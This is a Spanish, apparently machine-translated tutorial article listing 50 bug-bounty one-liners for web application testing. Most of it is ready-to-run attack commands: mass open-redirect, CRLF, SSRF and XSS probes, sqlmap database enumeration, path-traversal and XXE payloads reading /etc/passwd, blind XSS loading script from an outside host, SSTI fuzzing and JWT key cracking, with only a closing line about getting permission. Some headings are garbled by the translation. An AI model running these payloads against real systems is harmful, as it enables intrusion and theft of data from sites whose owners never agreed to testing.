Mejore su juego de pruebas de seguridad de aplicaciones web

Mejore su juego de pruebas de seguridad de aplicaciones web - Codelivly

¿Eres un cazarrecompensas de errores que busca herramientas poderosas y efectivas para agregar a tu arsenal? ¡No busque más! En el acelerado mundo actual de la seguridad de las aplicaciones web, el tiempo es esencial y la capacidad de probar vulnerabilidades de forma rápida y eficiente puede marcar la diferencia en el éxito de un programa de recompensas por errores.

Es por eso que hemos compilado una lista completa de 50 scripts de una línea que pueden ayudarlo con sus pruebas de vulnerabilidad. Estos scripts cubren una amplia gama de escenarios de prueba, desde inyección SQL y recorrido de directorios hasta pruebas JWT y pruebas GraphQL. Con estas poderosas frases ingeniosas a su disposición, podrá probar rápida y fácilmente las vulnerabilidades comunes en las aplicaciones web.

Algunas de estas frases ingeniosas usan herramientas conocidas como curl y grep, mientras que otras usan herramientas más especializadas como subjack y gqlmap. Independientemente de la herramienta, cada una de las líneas está diseñada para ser eficiente y eficaz, lo que le permite identificar y explotar rápidamente las vulnerabilidades en su aplicación de destino.

Además de los beneficios técnicos de estos scripts, también brindan un nivel de conveniencia y facilidad de uso que puede ahorrarle tiempo y esfuerzo valiosos durante el proceso de recompensa por errores. En lugar de tener que realizar cada prueba individual de forma manual, estas frases ingeniosas le permiten automatizar muchos de los aspectos más repetitivos y lentos de las pruebas de vulnerabilidad.

Entonces, si está buscando mejorar su juego de caza de errores, estas 50 poderosas frases ingeniosas son un excelente lugar para comenzar. Con su combinación de eficiencia, eficacia y conveniencia, seguramente se convertirán en una parte esencial de su kit de herramientas Bug Bounty.

Índice
  1. 1. Abrir Redirect Check One Liner
  2. 2. Comprobación de inyección SQL de OneLiner
  3. 3. Comprobación de redirección abierta basada en el encabezado de ubicación
  4. 4. Comprobaciones XSS en la lista de URL
  5. 5. Comprobación de inyección CRLF One Liner
  6. 6.SSRF Comprobar un forro
  7. 7. Actuador SpringBoot Revise un revestimiento
  8. 8. Coloque la carga útil XSS ciega en la lista de URL con parámetros
  9. 9. Comprobación de reflexión (XSS) en un dominio mediante la extracción de parámetros ocultos
  10. 10. Encuentre parámetros ocultos a través del rastreo en la lista de URL
  11. 11. Encuentra secretos en archivos Javascripts a través de la exploración
  12. 12. Obtener dominios del archivo de Wayback (dominios raíz de entrada)
  13. 13. Directorio de fuerza bruta usando dirsearch y ffuf
  14. 14. Explora la lista de dominios
  15. 15. Subdominio Bruteforce usando ffuf
  16. 16. Escanee Log4J en la lista de dominios
  17. 17. Caza XSS
  18. 18. Caza SQLi
  19. 19. Persiguiendo a la SSRF
  20. 20. Chase BIA
  21. 21. Redirección abierta de búsqueda
  22. 22. Elimina la contaminación del prototipo.
  23. 23. Persiguiendo el CORS
  24. 24. Extraer .js
  25. 25. Extraiga las URL de los comentarios
  26. 26. Limpiar los activos afectados de HackerOne
  27. 27. Encuentra host/dominio/activos en vivo
  28. 28. Captura de pantalla
  29. 29. Pruebas ciegas de inyección de SQL con cargas útiles basadas en el tiempo
  30. 30. Prueba de recorrido de directorio (recorrido de ruta)
  31. 31. Listado de versiones de WordPress
  32. 32. Prueba de adquisición de subdominio usando subjack
  33. 33. Prueba de inyección de encabezado HTTP
  34. 34. Prueba de descarga de archivos
  35. 35. Prueba de falsificación de solicitud entre sitios (CSRF)
  36. 36. Prueba de inyección XXE (entidad externa XML)
  37. 37. Obtener tipo de contenido
  38. 38. Fuzz con FFUF
  39. 39. Extraiga la URL del archivo .apk
  40. 40. Divulgación de información
  41. 41. XSS pensativo
  42. 42. SSTI a RCE
  43. 43. Vuelca los activos en el alcance de chaos-bugbounty-list
  44. 44. Pruebas de intercambio de recursos de origen cruzado (CORS)
  45. 45. Pruebas ciegas SSRF (Server-Side Request Forgery) con cargas útiles basadas en el tiempo
  46. 46. ​​Prueba JWT (JSON Web Token) con jwt_tool
  47. 47. Probando GraphQL con gqlmap
  48. 48. Pruebas de inyección XXE (entidad externa XML) con Burp Suite
  49. 49. Pruebas de API con HTTPie
  50. 50. Prueba de inyección HTML
  51. Conclusión

1. Abrir Redirect Check One Liner

En la lista de dominios activos (archivo que contiene dominios activos)

Explicación - Toma la entrada del archivo de dominios en vivo y la pasa a rush, que ejecuta 40 trabajadores (-j40) en paralelo y muestra si el valor inyectado se refleja en el encabezado de respuesta (Ubicación).

cat live-domains | rush -j40 'if curl -Iks -m 10 "{}/https://redirect.com" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com" || curl -Iks -m 10 "{}/redirect.com" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com" || curl -Iks -m 10 "{}////;@redirect.com" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com" || curl -Iks -m 10 "{}/////redirect.com" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com"; then echo "{} It seems an Open Redirect Found"; fi'

En parámetros (archivo que contiene direcciones URL con parámetros)

Explicación - Toma la entrada del archivo de URL que luego pasa a qsreplace, que reemplaza el valor del parámetro con el inyectado. Luego lo pasa a rush, que ejecuta 40 trabajadores en paralelo y verifica si el valor inyectado viene en el encabezado de respuesta (Ubicación).

cat urls.txt | qsreplace "https://redirect.com" | rush -j40 'if curl -Iks -m 10 "{}" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com"; then echo "Open Redirect found on {}"; fi'

Caso de prueba 2

cat urls.txt | qsreplace "redirect.com" | rush -j40 'if curl -Iks -m 10 "{}" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com"; then echo "Open Redirect found on {}"; fi'

Caso de prueba 3

cat urls.txt | qsreplace "////;@redirect.com" | rush -j40 'if curl -Iks -m 10 "{}" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com"; then echo "Open Redirect found on {}"; fi'

Caso de prueba 4

cat urls.txt | qsreplace "/////redirect.com" | rush -j40 'if curl -Iks -m 10 "{}" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com"; then echo "Open Redirect found on {}"; fi'

En encabezados (archivo que contiene dominios activos)

Explicación - Toma la entrada de dominios en vivo como una lista y agrega todos los encabezados con el valor inyectado en la solicitud y verifica si esto se refleja en el encabezado de respuesta (Ubicación)

cat live-domains | rush -j40 'if curl -Iks -m 10 "$line" -H "CF-Connecting_IP: https://redirect.com" -H "From: root@https://redirect.com" -H "Client-IP: https://redirect.com" -H "X-Client-IP: https://redirect.com" -H "X-Forwarded-For: https://redirect.com" -H "X-Wap-Profile: https://redirect.com" -H "Forwarded: https://redirect.com" -H "True-Client-IP: https://redirect.com" -H "Contact: root@https://redirect.com" -H "X-Originating-IP: https://redirect.com" -H "X-Real-IP: https://redirect.com" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com" || curl -Iks -m 10 "$line" -H "CF-Connecting_IP: redirect.com" -H "From: root@redirect.com" -H "Client-IP: redirect.com" -H "X-Client-IP: redirect.com" -H "X-Forwarded-For: redirect.com" -H "X-Wap-Profile: redirect.com" -H "Forwarded: redirect.com" -H "True-Client-IP: redirect.com" -H "Contact: root@redirect.com" -H "X-Originating-IP: redirect.com" -H "X-Real-IP: redirect.com" | egrep "^(Location|location)\\:(| *| (http|https)\\:\\/\\/| *\\/\\/| [a-zA-Z]*\\.| (http|https)\\:\\/\\/[a-zA-Z]*\\.)redirect\\.com"; then echo "The URL $line with vulnerable header may be vulnerable to Open Redirection. Check Manually";fi'

2. Comprobación de inyección SQL de OneLiner

En la lista de URL

Explicación - Rush toma el archivo de URL de entrada y ejecuta 20 trabajadores de sqlmap en paralelo. Primero comprueba si la URL está activa o no.

cat urls.txt | rush -j20 'if curl -Is "{}" | head -1 | grep -q "HTTP"; then echo "Running Sqlmap on '{}'"; sqlmap -u "{}" --batch --random-agent --dbs; fi'

3. Comprobación de redirección abierta basada en el encabezado de ubicación

Explicación - Si la URL tiene la respuesta 301 302 307, verifica si el valor del encabezado Ubicación está presente o no en la URL original. Si el valor está presente en la URL o el parámetro, intenta reemplazarlo con el valor personalizado, si obtiene el valor personalizado reflejado en el encabezado de respuesta, entonces alerta que se encuentra la redirección abierta.

cat urls.txt | rush 'if curl -skI "{}" -H "User-Agent: Mozilla/Firefox 80" | grep -i "HTTP/1.1 \|HTTP/2" | cut -d" " -f2 | grep -q "301\|302\|307";then domain=`curl -skI "{}" -H "User-Agent: Mozilla/Firefox 80" | grep -i "Location\:\|location\:" | cut -d" " -f2 | cut -d"/" -f1-3 | sed "s/^http\(\|s\):\/\///g" | sed "s/\s*$//"`; path=`echo "{}" | cut -d"/" -f4-20`; if echo "$path" | grep -q "$domain"; then echo "Reflection Found on Location headers from URL '{}'";fi;fi'

4. Comprobaciones XSS en la lista de URL

Explicación - Toma la entrada del archivo urls y la pasa a la herramienta dalfox para el análisis xss y la guarda en el archivo xss.txt.

cat urls.txt | dalfox pipe --multicast -o xss.txt

5. Comprobación de inyección CRLF One Liner

En dominios activos

Explicación - Toma la entrada del archivo de dominios en vivo y la pasa a rush, que ejecuta 40 trabajadores (-j40) en paralelo y muestra si el valor inyectado se refleja en el encabezado de respuesta.

cat live-domains | rush -j40 'if curl -Iks -m 10 "{}/%0D%0Acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "{}/%0d%0acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "{}/%E5%98%8D%E5%98%8Acrlf:crlf" | grep -q "^crlf:crlf"; then echo "The URL {} may be vulnerable to CRLF Injection. Check Manually";fi'
En URL activas con parámetros

Explicación - Toma la entrada del archivo urls y la pasa a qsreplace, que reemplaza el valor de los parámetros como el inyectado y lo pasa a rush, que ejecuta 40 trabajadores (-j40) en paralelo y muestra si el valor inyectado se refleja en el encabezado en -response .

cat urls.txt | qsreplace "%0d%0acrlf:crlf" | rush -j40 'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi'

Caso de prueba 2

cat urls.txt | qsreplace "%E5%98%8D%E5%98%8Acrlf:crlf" | rush -j40 'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi'

Caso de prueba 3

cat urls.txt | qsreplace -a "%0d%0acrlf:crlf" | rush -j40 'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi'
En encabezados (archivos que contienen dominios activos)

Explicación - Si un encabezado es vulnerable a la inyección de crlf, alerta.

cat $1 | rush -j40 'if curl -Iks -m 10 "{}" -H "CF-Connecting_IP: %0d%0acrlf:crlf" -H "From: root@%0d%0acrlf:crlf" -H "Client-IP: %0d%0acrlf:crlf" -H "X-Client-IP: %0d%0acrlf:crlf" -H "X-Forwarded-For: %0d%0acrlf:crlf" -H "X-Wap-Profile: %0d%0acrlf:crlf" -H "Forwarded: %0d%0acrlf:crlf" -H "True-Client-IP: %0d%0acrlf:crlf" -H "Contact: root@%0d%0acrlf:crlf" -H "X-Originating-IP: %0d%0acrlf:crlf" -H "X-Real-IP: %0d%0acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "$line" -H "CF-Connecting_IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "From: root@%E5%98%8D%E5%98%8Acrlf:crlf" -H "Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Forwarded-For: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Wap-Profile: %E5%98%8D%E5%98%8Acrlf:crlf" -H "Forwarded: %E5%98%8D%E5%98%8Acrlf:crlf" -H "True-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "Contact: root@%E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Originating-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Real-IP: %E5%98%8D%E5%98%8Acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "$line" -H "CF-Connecting_IP: %0D%0Acrlf:crlf" -H "From: root@%0D%0Acrlf:crlf" -H "Client-IP: %0D%0Acrlf:crlf" -H "X-Client-IP: %0D%0Acrlf:crlf" -H "X-Forwarded-For: %0D%0Acrlf:crlf" -H "X-Wap-Profile: %0D%0Acrlf:crlf" -H "Forwarded: %0D%0Acrlf:crlf" -H "True-Client-IP: %0D%0Acrlf:crlf" -H "Contact: root@%0D%0Acrlf:crlf" -H "X-Originating-IP: %0D%0Acrlf:crlf" -H "X-Real-IP: %0D%0Acrlf:crlf" | grep -q "^crlf:crlf"; then echo "The URL {} with vulnerable header may be vulnerable to CRLF Injection. Check Manually";fi'

6.SSRF Comprobar un forro

En encabezados (archivo que contiene dominios activos)

Explicación - El servidor colaborador de Burp inyecta en los encabezados solicitados y emite una solicitud y la guarda en el archivo de salida, incluida la hora de cada solicitud, de modo que si se obtiene un resultado, se puede confirmar comprobando la demanda de tiempo.

Reemplace $ 2 con su servidor colaborador de eructos.

cat live-domains | rush -j40 'if curl -skL -o /dev/null "{}" -H "CF-Connecting_IP: $2" -H "From: root@$2" -H "Client-IP: $2" -H "X-Client-IP: $2" -H "X-Forwarded-For: $2" -H "X-Wap-Profile: http://$2/wap.xml" -H "Forwarded: $2" -H "True-Client-IP: $2" -H "Contact: root@$2" -H "X-Originating-IP: $2" -H "X-Real-IP: $2"; then echo "{}" | ts; fi' | tee -a ssrf-headers-out.txt
En las URL que contienen parámetros

Explicación - Toma la lista de URL, reemplaza el valor de los parámetros en el servidor del colaborador burp y lo pasa a Rush para el trabajo paralelo.

cat urls.txt | qsreplace "your.burpcollaborator.server" | rush -j40 'if curl -skL "{}" -o /dev/null; then echo "{}" | ts; fi' | tee -a ssrf-output-log.txt

Caso de prueba 2

cat params.txt | qsreplace "http://$1" | rush -j40 'if curl -skL "{}" -o /dev/null; then echo "{}" | ts; fi' | tee -a ssrf-output-log.txt

7. Actuador SpringBoot Revise un revestimiento

En dominios activos

Explicación - Toma la lista de dominios en vivo y verifica si los actuadores Springboot están disponibles públicamente o no.

cat live-domains | rush -j40 'if curl -skI -m 10 "{}/env" | grep -i "x-application-context" || curl -sk -m 10 "{}/actuator/env" | grep -q "sping.config.location\|spring.application.name\|JAVA_HOME" || curl -sk -m 10 "{}/env" | grep -q "sping.config.location\|spring.application.name\|JAVA_HOME" || curl -sk -m 10 "{}/actuator" | grep -q '{"_links":{"self"' || curl -sk -m 10 "{}/actuator/configprops" | grep -q "org.springframework.boot.actuate\|beans" || curl -sk -m 10 "{}/configprops" | grep -q "org.springframework.boot.actuate\|beans"; then echo "SpringBoot Actuator Found on {}"; fi' &
En URL activas con parámetros

Explicación - Toma la lista de URL y verifica si la aplicación usa Springboot o no.

cat params.txt | rush -j40 'if curl -skI -m 10 "{}" | grep -i "x-application-context"; then echo "SpringBoot application context header Found on {}"; fi'

8. Coloque la carga útil XSS ciega en la lista de URL con parámetros

Explicación - Toma el archivo de URL como entrada, reemplaza el valor del parámetro con una carga xss ciega y emite la solicitud con 40 trabajadores ejecutándose en paralelo.

cat urls.txt | qsreplace '"><script src="https://script.xss.ht"></script>' | rush -j40 'curl -sk "{}" -o /dev/null'

9. Comprobación de reflexión (XSS) en un dominio mediante la extracción de parámetros ocultos

Explicación - Extrae parámetros ocultos de la página y comprueba si puede ser vulnerable a xss o no.

curl -skL "https://in.yahoo.com" | grep 'type="hidden"' | grep -Eo 'name="[^\"]+"' | cut -d'"' -f2 | xargs -I@ sh -c 'if curl -skL https://in.yahoo.com/?@=testxss | grep -q "value=testxss"; then echo "reflection found from @ parameter"; fi'

10. Encuentre parámetros ocultos a través del rastreo en la lista de URL

Explicación - Toma la lista de URL y extrae los parámetros ocultos de la lista de URL y guarda los parámetros únicos en el archivo.

cat alive.txt | rush 'curl -skL "{}" | grep "type\=\"hidden\"" | grep -Eo "name\=\"[^\"]+\"" | cut -d"\"" -f2 | sort -u' | anew params.txt

11. Encuentra secretos en archivos Javascripts a través de la exploración

Explicación - Toma dominios en vivo como entrada, los analiza con la herramienta hakrawler que extrae los archivos javascript y luego los pasa al script Secretfinder que verifica los datos confidenciales en los archivos javascript.

cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder

12. Obtener dominios del archivo de Wayback (dominios raíz de entrada)

Explicación - Toma la entrada del archivo de dominios raíz y extrae los dominios del archivo wayback.

Ejemplo de dominios raíz - gq1.yahoo.com, abc.yahoo.com, root.yahoo.com, etc.

cat root-dom.txt | rush 'curl -s "http://web.archive.org/cdx/search/cdx?url=*.{}/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sed 's/\.com.*/.com/' | sort -u'

13. Directorio de fuerza bruta usando dirsearch y ffuf

Explicación - Directecotry fuerza bruta usando ffuf. Toma la entrada de dominios en vivo y busca directorios y archivos.

cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt
utilizar la búsqueda directa

Explicación: Direcotry bruteforce usando dirsearch. Toma la entrada de dominios en vivo y busca directorios y archivos.

cat alive.txt | xargs -I@ sh -c 'python3 /root/Tools/dirsearch/dirsearch.py -w /path/to/wordlist.txt -u @ -e php,html,json,aspx -t 100' | tee -a dirsearch

14. Explora la lista de dominios

Explicación - Rastreo de lista de dominios en paralelo con 30 trabajadores.

cat alive.txt | xargs -P30 -I@ gospider -c 30 -t 15 -a -s @ -d 3 | anew spider

15. Subdominio Bruteforce usando ffuf

Explicación - Subdominios de fuerza bruta utilizando la herramienta ffuf.

ffuf -u https://FUZZ.domain.com -w /path/to/wordlist -v | grep "| URL |" | awk '{print $4}'

16. Escanee Log4J en la lista de dominios

Explicación - Toma dominios activos como entrada y busca vulnerabilidades de log4j.

cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u "@"

17. Caza XSS

cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

18. Caza SQLi

httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

19. Persiguiendo a la SSRF

findomain -t http://target.com -q | httpx -silent -threads 1000 | gau |  grep "=" | qsreplace http://YOUR.burpcollaborator.net

20. Chase BIA

gau http://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

21. Redirección abierta de búsqueda

gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

22. Elimina la contaminación del prototipo.

subfinder -d http://target.com | httpx -silent | sed 's/$/\/?__proto__[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"

23. Persiguiendo el CORS

gau http://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

24. Extraer .js

echo http://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder http://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew 

25. Extraiga las URL de los comentarios

cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'

26. Limpiar los activos afectados de HackerOne

curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]

27. Encuentra host/dominio/activos en vivo

subfinder -d http://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

28. Captura de pantalla

assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' 

29. Pruebas ciegas de inyección de SQL con cargas útiles basadas en el tiempo

time curl -s 'https://target.com/search.php?q=1 AND sleep(5)--'

30. Prueba de recorrido de directorio (recorrido de ruta)

curl 'https://target.com/page.php?page=../../../../etc/passwd'

31. Listado de versiones de WordPress

curl -s 'https://target.com/readme.html' | grep 'Version'

32. Prueba de adquisición de subdominio usando subjack

subjack -w subdomains.txt -a -t 100 -v -o takeover.txt -ssl

33. Prueba de inyección de encabezado HTTP

curl -H 'X-Forwarded-For: 127.0.0.1\r\nUser-Agent: Mozilla/5.0' 'https://target.com/'

34. Prueba de descarga de archivos

curl -X POST -F 'file=@test.php' 'https://target.com/upload.php'

35. Prueba de falsificación de solicitud entre sitios (CSRF)

curl -X POST -d 'name=admin&password=123456&csrf_token=123456' 'https://target.com/login.php'

36. Prueba de inyección XXE (entidad externa XML)

curl -d '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' 'https://target.com/xxe.php'

37. Obtener tipo de contenido

echo abc.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'

38. Fuzz con FFUF

assetfinder http://att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'

39. Extraiga la URL del archivo .apk

apktool -d com.uber -o uberAPK; grep -Phro "(https?://)[\w\,-/]+[\"\']" uberAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"

40. Divulgación de información

cat host.txt | httpx -path //server-status?full=true -status-code -content-length
cat host.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length

41. XSS pensativo

subfinder -d abc.com | httprobe -c 100 > target.txt 
cat target.txt | waybackurls | gf xss | kxss
gospider -a -s abc.com -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'

42. SSTI a RCE

 waybackurls http://target.com | qsreplace "abc{{9*9}}" > fuzz.txt
 ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/

43. Vuelca los activos en el alcance de chaos-bugbounty-list

curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'

44. Pruebas de intercambio de recursos de origen cruzado (CORS)

curl -I -H 'Origin: https://evil.com' 'https://target.com/api.php'

45. Pruebas ciegas SSRF (Server-Side Request Forgery) con cargas útiles basadas en el tiempo

time curl -s 'https://target.com/api.php?url=http://evil.com&secret_token=123' -H 'X-Forwarded-For: 127.0.0.1'

46. ​​Prueba JWT (JSON Web Token) con jwt_tool

jwt_tool.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c -k secret

47. Probando GraphQL con gqlmap

gqlmap.py -u 'https://target.com/graphql' -t GET --level 2

48. Pruebas de inyección XXE (entidad externa XML) con Burp Suite

curl -d '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' 'https://target.com/xxe.php' | base64 -w 0 | pbcopy

A continuación, pegue la consulta codificada en base64 en la función "Pegar desde el portapapeles" de Burp Suite.

49. Pruebas de API con HTTPie

http https://target.com/api/v1/users/1 Authorization:'Bearer JWT_TOKEN'

50. Prueba de inyección HTML

curl -d '<script>alert("XSS")</script>' 'https://target.com/comment.php'

Este one-liner envía una solicitud POST con una etiqueta de secuencia de comandos como parámetro de comentario. La etiqueta del script se reflejará en la respuesta si es posible la inyección de HTML, lo que indica una vulnerabilidad potencial para los ataques de secuencias de comandos entre sitios (XSS).

Conclusión

En conclusión, esperamos que estas 50 poderosas frases ingeniosas le hayan brindado un nuevo conjunto de herramientas para ayudarlo a enfrentar los desafíos de la caza de recompensas por errores. El mundo de la seguridad de las aplicaciones web cambia constantemente, y la capacidad de identificar y explotar rápidamente las vulnerabilidades es más importante que nunca.

Al usar estos scripts, puede ahorrar tiempo y esfuerzo valiosos durante el proceso de prueba de vulnerabilidades, lo que le permite concentrarse en los problemas más críticos y maximizar sus recompensas. Con un poco de creatividad y un poco de conocimiento técnico, puedes llevar tu juego Bug Bounty al siguiente nivel.

Recuerde, sin embargo, que un gran poder conlleva una gran responsabilidad. Siempre obtenga permiso antes de realizar pruebas en cualquier sitio web o servidor, y asegúrese de seguir las pautas éticas y las prácticas de divulgación responsable. Juntos podemos hacer de la web un lugar más seguro para todos los usuarios.

Así que siga adelante y piratee de manera responsable, armado con esas poderosas frases ingeniosas como su compañero de confianza. ¡Buena caza!

Si quieres conocer otros artículos parecidos a Mejore su juego de pruebas de seguridad de aplicaciones web puedes visitar la categoría Tutoriales.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir

Esta página web utiliza cookies para analizar de forma anónima y estadística el uso que haces de la web, mejorar los contenidos y tu experiencia de navegación. Para más información accede a la Política de Cookies . Ver mas